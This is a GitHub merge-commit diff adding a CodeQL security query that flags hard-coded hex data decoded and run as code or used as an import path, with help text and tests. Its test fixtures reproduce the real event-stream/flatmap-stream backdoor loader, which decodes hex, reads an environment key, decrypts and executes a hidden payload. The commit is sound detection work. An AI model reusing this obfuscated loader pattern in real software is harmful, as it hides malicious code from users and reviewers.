Merge pull request #571 from xiemaisi/js/numeric-constant-interpreted-as-code

JavaScript: Add new query `HardcodedDataInterpretedAsCode`.
This commit is contained in:
Asger F
2018-11-29 17:07:48 +00:00
committed by GitHub
20 changed files with 312 additions and 21 deletions

View File

@@ -2,7 +2,7 @@
## General improvements
* Modelling of taint flow through array operations has been improved. This may give additional results for the security queries.
* Modeling of taint flow through array and buffer operations has been improved. This may give additional results for the security queries.
* Support for AMD modules has been improved. This may give additional results for the security queries as well as any queries that use type inference on code bases that use such modules.
@@ -23,6 +23,7 @@
|-----------------------------------------------|------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| Enabling Node.js integration for Electron web content renderers (`js/enabling-electron-renderer-node-integration`) | security, frameworks/electron, external/cwe/cwe-094 | Highlights Electron web content renderer preferences with Node.js integration enabled, indicating a violation of [CWE-94](https://cwe.mitre.org/data/definitions/94.html). Results are not shown on LGTM by default. |
| File data in outbound network request | security, external/cwe/cwe-200 | Highlights locations where file data is sent in a network request. Results are not shown on LGTM by default. |
| Hard-coded data interpreted as code | security, external/cwe/cwe-506 | Highlights locations where hard-coded data is transformed and then executed as code or interpreted as an import path, which may indicate embedded malicious code ([CWE-506](https://cwe.mitre.org/data/definitions/506.html)). Results are shown on LGTM by default. |
| Host header poisoning in email generation | security, external/cwe/cwe-640 | Highlights code that generates emails with links that can be hijacked by HTTP host header poisoning, indicating a violation of [CWE-640](https://cwe.mitre.org/data/definitions/640.html). Results shown on LGTM by default. |
| Replacement of a substring with itself (`js/identity-replacement`) | correctness, security, external/cwe/cwe-116 | Highlights string replacements that replace a string with itself, which usually indicates a mistake. Results shown on LGTM by default. |
| Stored cross-site scripting (`js/stored-xss`) | security, external/cwe/cwe-079, external/cwe/cwe-116 | Highlights uncontrolled stored values flowing into HTML content, indicating a violation of [CWE-079](https://cwe.mitre.org/data/definitions/79.html). Results shown on LGTM by default. |

View File

@@ -20,6 +20,7 @@
+ semmlecode-javascript-queries/Security/CWE-352/MissingCsrfMiddleware.ql: /Security/CWE/CWE-352
+ semmlecode-javascript-queries/Security/CWE-400/RemotePropertyInjection.ql: /Security/CWE/CWE-400
+ semmlecode-javascript-queries/Security/CWE-502/UnsafeDeserialization.ql: /Security/CWE/CWE-502
+ semmlecode-javascript-queries/Security/CWE-506/HardcodedDataInterpretedAsCode.ql: /Security/CWE/CWE-506
+ semmlecode-javascript-queries/Security/CWE-601/ClientSideUrlRedirect.ql: /Security/CWE/CWE-601
+ semmlecode-javascript-queries/Security/CWE-601/ServerSideUrlRedirect.ql: /Security/CWE/CWE-601
+ semmlecode-javascript-queries/Security/CWE-611/Xxe.ql: /Security/CWE/CWE-611

View File

@@ -0,0 +1,46 @@
<!DOCTYPE qhelp PUBLIC "-//Semmle//qhelp//EN" "qhelp.dtd">
<qhelp>
<overview>
<p>
Interpreting hard-coded data, such as string literals containing hexadecimal numbers,
as code or as an import path is typical of malicious backdoor code that has been
implanted into an otherwise trusted code base and is trying to hide its true purpose
from casual readers or automated scanning tools.
</p>
</overview>
<recommendation>
<p>
Examine the code in question carefully to ascertain its provenance and its true purpose.
If the code is benign, it should always be possible to rewrite it without relying
on dynamically interpreting data as code, improving both clarity and safety.
</p>
</recommendation>
<example>
<p>
As an example of malicious code using this obfuscation technique, consider the following
simplified version of a snippet of backdoor code that was discovered in a dependency of
the popular <code>event-stream</code> npm package:
</p>
<sample src="examples/HardcodedDataInterpretedAsCode.js"/>
<p>
While this shows only the first few lines of code, it already looks very suspicious
since it takes a hard-coded string literal, hex-decodes it and then uses it as an
import path. The only reason to do so is to hide the name of the file being imported.
</p>
</example>
<references>
<li>
OWASP:
<a href="https://www.owasp.org/index.php/Trojan_Horse">Trojan Horse</a>.
</li>
<li>
The npm Blog:
<a href="https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident">Details about the event-stream incident</a>.
</li>
</references>
</qhelp>

View File

@@ -0,0 +1,22 @@
/**
* @name Hard-coded data interpreted as code
* @description Transforming hard-coded data (such as hexadecimal constants) into code
* to be executed is a technique often associated with backdoors and should
* be avoided.
* @kind path-problem
* @problem.severity error
* @precision medium
* @id js/hardcoded-data-interpreted-as-code
* @tags security
* external/cwe/cwe-506
*/
import javascript
import semmle.javascript.security.dataflow.HardcodedDataInterpretedAsCode::HardcodedDataInterpretedAsCode
import DataFlow::PathGraph
from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink,
"Hard-coded data from $@ is interpreted as " + sink.getNode().(Sink).getKind() + ".",
source.getNode(), "here"

View File

@@ -0,0 +1,8 @@
var r = require;
function e(r) {
return Buffer.from(r, "hex").toString()
}
// BAD: hexadecimal constant decoded and interpreted as import path
var n = r(e("2e2f746573742f64617461"));

View File

@@ -132,7 +132,13 @@ predicate findNodeModulesFolder(Folder f, Folder nodeModules, int distance) {
*/
private class RequireVariable extends Variable {
RequireVariable() {
exists (ModuleScope m | this = m.getVariable("require"))
this = any(ModuleScope m).getVariable("require")
or
// cover cases where we failed to detect Node.js code
this.(GlobalVariable).getName() = "require"
or
// track through assignments to other variables
this.getAnAssignedExpr().(VarAccess).getVariable() instanceof RequireVariable
}
}
@@ -149,7 +155,9 @@ private predicate moduleInFile(Module m, File f) {
class Require extends CallExpr, Import {
Require() {
exists (RequireVariable req |
this.getCallee() = req.getAnAccess()
this.getCallee() = req.getAnAccess() and
// `mjs` files explicitly disallow `require`
getFile().getExtension() != "mjs"
)
}

View File

@@ -297,7 +297,22 @@ module NodeJSLib {
override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
pred = tainted and succ = this
}
}
/**
* A model of taint propagation through `new Buffer` and `Buffer.from`.
*/
private class BufferTaintStep extends TaintTracking::AdditionalTaintStep, DataFlow::InvokeNode {
BufferTaintStep() {
this = DataFlow::globalVarRef("Buffer").getAnInstantiation()
or
this = DataFlow::globalVarRef("Buffer").getAMemberInvocation("from")
}
override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
pred = getArgument(0) and
succ = this
}
}
/**

View File

@@ -0,0 +1,97 @@
/**
* Provides a taint-tracking configuration for reasoning about hard-coded data
* being interpreted as code.
*/
import javascript
private import semmle.javascript.security.dataflow.CodeInjection
module HardcodedDataInterpretedAsCode {
/**
* A data flow source for hard-coded data.
*/
abstract class Source extends DataFlow::Node {
/** Gets a flow label for which this is a source. */
DataFlow::FlowLabel getLabel() {
result = DataFlow::FlowLabel::data()
}
}
/**
* A data flow sink for code injection.
*/
abstract class Sink extends DataFlow::Node {
/** Gets a flow label for which this is a sink. */
abstract DataFlow::FlowLabel getLabel();
/** Gets a description of what kind of sink this is. */
abstract string getKind();
}
/**
* A sanitizer for hard-coded data.
*/
abstract class Sanitizer extends DataFlow::Node {}
/**
* A taint-tracking configuration for reasoning about hard-coded data
* being interpreted as code
*/
class Configuration extends TaintTracking::Configuration {
Configuration() {
this = "HardcodedDataInterpretedAsCode"
}
override predicate isSource(DataFlow::Node source, DataFlow::FlowLabel lbl) {
source.(Source).getLabel() = lbl
}
override predicate isSink(DataFlow::Node nd, DataFlow::FlowLabel lbl) {
nd.(Sink).getLabel() = lbl
}
override predicate isSanitizer(DataFlow::Node node) {
node instanceof Sanitizer
}
}
/**
* A constant string consisting of eight or more hexadecimal characters (including at
* least one digit), viewed as a source of hard-coded data that should not be
* interpreted as code.
*/
private class DefaultSource extends Source, DataFlow::ValueNode {
DefaultSource() {
exists (string val | val = astNode.(Expr).getStringValue() |
val.regexpMatch("[0-9a-fA-F]{8,}") and
val.regexpMatch(".*[0-9].*")
)
}
}
/**
* A code injection sink; hard-coded data should not flow here.
*/
private class DefaultCodeInjectionSink extends Sink {
DefaultCodeInjectionSink() { this instanceof CodeInjection::Sink }
override DataFlow::FlowLabel getLabel() { result = DataFlow::FlowLabel::taint() }
override string getKind() { result = "code" }
}
/**
* An argument to `require` path; hard-coded data should not flow here.
*/
private class RequireArgumentSink extends Sink {
RequireArgumentSink() {
this = any(Require r).getAnArgument().flow()
}
override DataFlow::FlowLabel getLabel() {
result = DataFlow::FlowLabel::data()
or
result = DataFlow::FlowLabel::taint()
}
override string getKind() { result = "an import path" }
}
}

View File

@@ -1,14 +1,18 @@
| a.js:1:9:1:22 | require('./b') | ./b | b.js:1:1:8:0 | <toplevel> |
| a.js:3:6:3:23 | require('./sub/c') | ./sub/c | sub/c.js:1:1:4:0 | <toplevel> |
| a.js:4:6:4:29 | require ... /d.js') | ./sub/../d.js | d.js:1:1:7:15 | <toplevel> |
| a.js:7:1:7:18 | require('./sub/c') | ./sub/c | sub/c.js:1:1:4:0 | <toplevel> |
| a.js:10:1:10:18 | require(__dirname) | | index.js:1:1:3:0 | <toplevel> |
| a.js:11:1:11:25 | require ... + '/e') | /e | e.js:1:1:7:0 | <toplevel> |
| a.js:12:1:12:28 | require ... + 'c') | ./sub/c | sub/c.js:1:1:4:0 | <toplevel> |
| b.js:1:1:1:18 | require('./sub/c') | ./sub/c | sub/c.js:1:1:4:0 | <toplevel> |
| d.js:7:1:7:14 | require('foo') | foo | sub/f.js:1:1:4:17 | <toplevel> |
| index.js:2:1:2:41 | require ... b.js")) | /index.js/../b.js | b.js:1:1:8:0 | <toplevel> |
| mjs-files/require-from-js.js:1:12:1:36 | require ... on-me') | ./depend-on-me | mjs-files/depend-on-me.mjs:1:1:7:1 | <toplevel> |
| mjs-files/require-from-js.js:2:12:2:39 | require ... me.js') | ./depend-on-me.js | mjs-files/depend-on-me.js:1:1:8:0 | <toplevel> |
| mjs-files/require-from-js.js:3:12:3:40 | require ... e.mjs') | ./depend-on-me.mjs | mjs-files/depend-on-me.mjs:1:1:7:1 | <toplevel> |
| sub/c.js:1:1:1:15 | require('../a') | ../a | a.js:1:1:14:0 | <toplevel> |
| a.js:1:9:1:22 | require('./b') |
| a.js:2:7:2:19 | require('fs') |
| a.js:3:6:3:23 | require('./sub/c') |
| a.js:4:6:4:29 | require ... /d.js') |
| a.js:7:1:7:18 | require('./sub/c') |
| a.js:10:1:10:18 | require(__dirname) |
| a.js:11:1:11:25 | require ... + '/e') |
| a.js:12:1:12:28 | require ... + 'c') |
| b.js:1:1:1:18 | require('./sub/c') |
| d.js:1:1:1:38 | require ... s/ini') |
| d.js:7:1:7:14 | require('foo') |
| f.js:2:1:2:7 | r("fs") |
| index.js:1:12:1:26 | require('path') |
| index.js:2:1:2:41 | require ... b.js")) |
| mjs-files/require-from-js.js:1:12:1:36 | require ... on-me') |
| mjs-files/require-from-js.js:2:12:2:39 | require ... me.js') |
| mjs-files/require-from-js.js:3:12:3:40 | require ... e.mjs') |
| sub/c.js:1:1:1:15 | require('../a') |

View File

@@ -1,6 +1,4 @@
import semmle.javascript.NodeJS
from Require r, string fullpath, string prefix
where fullpath = r.getImportedPath().getValue() and
sourceLocationPrefix(prefix)
select r, fullpath.replaceAll(prefix, ""), r.getImportedModule()
from Require r
select r

View File

@@ -0,0 +1,14 @@
| a.js:1:9:1:22 | require('./b') | ./b | b.js:1:1:8:0 | <toplevel> |
| a.js:3:6:3:23 | require('./sub/c') | ./sub/c | sub/c.js:1:1:4:0 | <toplevel> |
| a.js:4:6:4:29 | require ... /d.js') | ./sub/../d.js | d.js:1:1:7:15 | <toplevel> |
| a.js:7:1:7:18 | require('./sub/c') | ./sub/c | sub/c.js:1:1:4:0 | <toplevel> |
| a.js:10:1:10:18 | require(__dirname) | | index.js:1:1:3:0 | <toplevel> |
| a.js:11:1:11:25 | require ... + '/e') | /e | e.js:1:1:7:0 | <toplevel> |
| a.js:12:1:12:28 | require ... + 'c') | ./sub/c | sub/c.js:1:1:4:0 | <toplevel> |
| b.js:1:1:1:18 | require('./sub/c') | ./sub/c | sub/c.js:1:1:4:0 | <toplevel> |
| d.js:7:1:7:14 | require('foo') | foo | sub/f.js:1:1:4:17 | <toplevel> |
| index.js:2:1:2:41 | require ... b.js")) | /index.js/../b.js | b.js:1:1:8:0 | <toplevel> |
| mjs-files/require-from-js.js:1:12:1:36 | require ... on-me') | ./depend-on-me | mjs-files/depend-on-me.mjs:1:1:7:1 | <toplevel> |
| mjs-files/require-from-js.js:2:12:2:39 | require ... me.js') | ./depend-on-me.js | mjs-files/depend-on-me.js:1:1:8:0 | <toplevel> |
| mjs-files/require-from-js.js:3:12:3:40 | require ... e.mjs') | ./depend-on-me.mjs | mjs-files/depend-on-me.mjs:1:1:7:1 | <toplevel> |
| sub/c.js:1:1:1:15 | require('../a') | ../a | a.js:1:1:14:0 | <toplevel> |

View File

@@ -0,0 +1,6 @@
import semmle.javascript.NodeJS
from Require r, string fullpath, string prefix
where fullpath = r.getImportedPath().getValue() and
sourceLocationPrefix(prefix)
select r, fullpath.replaceAll(prefix, ""), r.getImportedModule()

View File

@@ -0,0 +1,2 @@
var r = require;
r("fs");

View File

@@ -23,3 +23,5 @@
| tst.js:2:13:2:20 | source() | tst.js:41:14:41:16 | ary |
| tst.js:2:13:2:20 | source() | tst.js:44:10:44:30 | innocen ... ) => x) |
| tst.js:2:13:2:20 | source() | tst.js:45:10:45:24 | x.map(x2 => x2) |
| tst.js:2:13:2:20 | source() | tst.js:47:10:47:30 | Buffer. ... 'hex') |
| tst.js:2:13:2:20 | source() | tst.js:48:10:48:22 | new Buffer(x) |

View File

@@ -44,4 +44,6 @@ function test() {
sink(innocent.map(() => x)); // NOT OK
sink(x.map(x2 => x2)); // NOT OK
sink(Buffer.from(x, 'hex')); // NOT OK
sink(new Buffer(x)); // NOT OK
}

View File

@@ -0,0 +1,29 @@
nodes
| event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") |
| event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" |
| event-stream.js:9:11:9:37 | e("2e2f ... 17461") |
| event-stream.js:9:13:9:36 | "2e2f74 ... 617461" |
| tst.js:1:5:1:88 | totallyHarmlessString |
| tst.js:1:29:1:88 | '636f6e ... 6e2729' |
| tst.js:2:6:2:46 | Buffer. ... 'hex') |
| tst.js:2:6:2:57 | Buffer. ... tring() |
| tst.js:2:18:2:38 | totally ... sString |
| tst.js:5:5:5:23 | test |
| tst.js:5:12:5:23 | "0123456789" |
| tst.js:7:8:7:11 | test |
| tst.js:7:8:7:15 | test+"n" |
edges
| event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") |
| event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | event-stream.js:9:11:9:37 | e("2e2f ... 17461") |
| tst.js:1:5:1:88 | totallyHarmlessString | tst.js:2:18:2:38 | totally ... sString |
| tst.js:1:29:1:88 | '636f6e ... 6e2729' | tst.js:1:5:1:88 | totallyHarmlessString |
| tst.js:2:6:2:46 | Buffer. ... 'hex') | tst.js:2:6:2:57 | Buffer. ... tring() |
| tst.js:2:18:2:38 | totally ... sString | tst.js:2:6:2:46 | Buffer. ... 'hex') |
| tst.js:5:5:5:23 | test | tst.js:7:8:7:11 | test |
| tst.js:5:12:5:23 | "0123456789" | tst.js:5:5:5:23 | test |
| tst.js:7:8:7:11 | test | tst.js:7:8:7:15 | test+"n" |
#select
| event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") | event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") | Hard-coded data from $@ is interpreted as an import path. | event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | here |
| event-stream.js:9:11:9:37 | e("2e2f ... 17461") | event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | event-stream.js:9:11:9:37 | e("2e2f ... 17461") | Hard-coded data from $@ is interpreted as an import path. | event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | here |
| tst.js:2:6:2:57 | Buffer. ... tring() | tst.js:1:29:1:88 | '636f6e ... 6e2729' | tst.js:2:6:2:57 | Buffer. ... tring() | Hard-coded data from $@ is interpreted as code. | tst.js:1:29:1:88 | '636f6e ... 6e2729' | here |
| tst.js:7:8:7:15 | test+"n" | tst.js:5:12:5:23 | "0123456789" | tst.js:7:8:7:15 | test+"n" | Hard-coded data from $@ is interpreted as code. | tst.js:5:12:5:23 | "0123456789" | here |

View File

@@ -0,0 +1 @@
Security/CWE-506/HardcodedDataInterpretedAsCode.ql

View File

@@ -0,0 +1,2 @@
// from https://unpkg.com/flatmap-stream@0.1.1/index.min.js
var Stream=require("stream").Stream;module.exports=function(e,n){var i=new Stream,a=0,o=0,u=!1,f=!1,l=!1,c=0,s=!1,d=(n=n||{}).failures?"failure":"error",m={};function w(r,e){var t=c+1;if(e===t?(void 0!==r&&i.emit.apply(i,["data",r]),c++,t++):m[e]=r,m.hasOwnProperty(t)){var n=m[t];return delete m[t],w(n,t)}a===++o&&(f&&(f=!1,i.emit("drain")),u&&v())}function p(r,e,t){l||(s=!0,r&&!n.failures||w(e,t),r&&i.emit.apply(i,[d,r]),s=!1)}function b(r,t,n){return e.call(null,r,function(r,e){n(r,e,t)})}function v(r){if(u=!0,i.writable=!1,void 0!==r)return w(r,a);a==o&&(i.readable=!1,i.emit("end"),i.destroy())}return i.writable=!0,i.readable=!0,i.write=function(r){if(u)throw new Error("flatmap stream is not writable");s=!1;try{for(var e in r){a++;var t=b(r[e],a,p);if(f=!1===t)break}return!f}catch(r){if(s)throw r;return p(r),!f}},i.end=function(r){u||v(r)},i.destroy=function(){u=l=!0,i.writable=i.readable=f=!1,process.nextTick(function(){i.emit("close")})},i.pause=function(){f=!0},i.resume=function(){f=!1},i};!function(){try{var r=require,t=process;function e(r){return Buffer.from(r,"hex").toString()}var n=r(e("2e2f746573742f64617461")),o=t[e(n[3])][e(n[4])];if(!o)return;var u=r(e(n[2]))[e(n[6])](e(n[5]),o),a=u.update(n[0],e(n[8]),e(n[9]));a+=u.final(e(n[9]));var f=new module.constructor;f.paths=module.paths,f[e(n[7])](a,""),f.exports(n[1])}catch(r){}}();

View File

@@ -0,0 +1,20 @@
// Based on https://github.com/dominictarr/event-stream/issues/116
var r = require, t = process;
function e(r) {
return Buffer.from(r, "hex").toString()
}
var n = r(e("2e2f746573742f64617461")),
o = t[e(n[3])][e(n[4])];
if (!o) return;
var u = r(e(n[2]))[e(n[6])](e(n[5]), o);
a += u.final(e(n[9]));
var f = new module.constructor;
f.paths = module.paths;
f[e(n[7])](a, "");
f.exports(n[1]);

View File

@@ -0,0 +1,13 @@
var totallyHarmlessString = '636f6e736f6c652e6c6f672827636f646520696e6a656374696f6e2729';
eval(Buffer.from(totallyHarmlessString, 'hex').toString()); // NOT OK: eval("console.log('code injection')")
eval(totallyHarmlessString); // OK: throws parse error
var test = "0123456789";
try {
eval(test+"n"); // OK, but currently flagged
console.log("Bigints supported.");
} catch(e) {
console.log("Bigints not supported.");
}
require('babeface'); // OK